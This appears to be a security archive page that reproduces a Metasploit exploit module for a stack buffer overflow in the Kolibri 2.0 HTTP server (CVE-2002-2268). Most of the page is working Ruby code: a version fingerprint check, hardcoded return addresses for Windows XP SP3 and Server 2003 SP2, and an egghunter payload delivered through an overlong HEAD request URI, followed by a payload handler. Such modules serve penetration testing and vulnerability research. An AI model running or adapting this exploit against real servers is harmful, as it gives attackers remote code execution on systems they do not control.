Kolibri 2.0 HTTP Server HEAD Buffer Overflow

Kolibri 2.0 HTTP Server HEAD Buffer Overflow: Posted Mar 14, 2011; Authored by TheLeader, mr_me | Site metasploit.com; This Metasploit module exploits a stack buffer overflow in version 2 of the Kolibri HTTP server.; tags | exploit, web, overflow; advisories | CVE-2002-2268, OSVDB-70808; SHA-256 | 5149ddbaf7b1d3d9357540ac0e57dbcd18547c2741a0e179a370629a91a6669b; Download | Favorite | View

Kolibri 2.0 HTTP Server HEAD Buffer Overflow

##
# $Id: kolibri_http.rb 10887 2011-08-03 12:19:19Z mr_me $

##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GoodRanking

  HttpFingerprint = { :pattern => [ /kolibri-2\.0/ ] }

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Egghunter

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Kolibri <= v2.0 HTTP Server HEAD Buffer Overflow',
      'Description'    => %q{This exploits a stack buffer overflow in version 2 of the Kolibri HTTP server.},
      'Author'         => 
          [ 
            'mr_me <steventhomasseeley@gmail.com>', # msf
            'TheLeader' # original exploit
          ],
      'Version'        => '$Revision: 10887 $',
      'References'     =>
        [
          [ 'CVE', '2002-2268' ],
          [ 'OSVDB', '70808' ],
          [ 'BID', '6289' ],
          [ 'URL', 'http://www.exploit-db.com/exploits/15834/' ],
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'       => 3000,
          'DisableNops' => true,
          'BadChars'    => "\x00\x0d\x0a\x3d\x20\x3f",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows XP sp3', { 'Ret' => 0x7E429353 } ] ,
          [ 'Windows Server 2003 sp2', { 'Ret' => 0x76F73BC3 } ] ,
        ],
      'DisclosureDate' => 'Dec 26 2010',
      'DefaultTarget'  => 0))
  end

  def check
    info = http_fingerprint
    if info and (info =~ /kolibri-2\.0/)
      return Exploit::CheckCode::Vulnerable
    end
    Exploit::CheckCode::Safe
  end

  def exploit
    #7E429353    FFE4            JMP     ESP
    # For a reliable and large payload, we use an egg hunter
    # and direct RET to execute code
    print_status("Sending request...")
    eh_stub, eh_egg = generate_egghunter(payload.encoded, payload_badchars)
    sploit = Rex::Text.rand_text_alphanumeric(515) + [target.ret].pack('V')
    sploit << eh_stub
    send_request_raw({
      'uri'     => "/" + sploit,
      'version' => '1.1',
      'method'  => 'HEAD',
      'headers' => {'Content-Type' => eh_egg},
    })

    handler
  end

end

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

Kolibri 2.0 HTTP Server HEAD Buffer Overflow

Kolibri 2.0 HTTP Server HEAD Buffer Overflow

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Kolibri 2.0 HTTP Server HEAD Buffer Overflow

Share This

Kolibri 2.0 HTTP Server HEAD Buffer Overflow

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems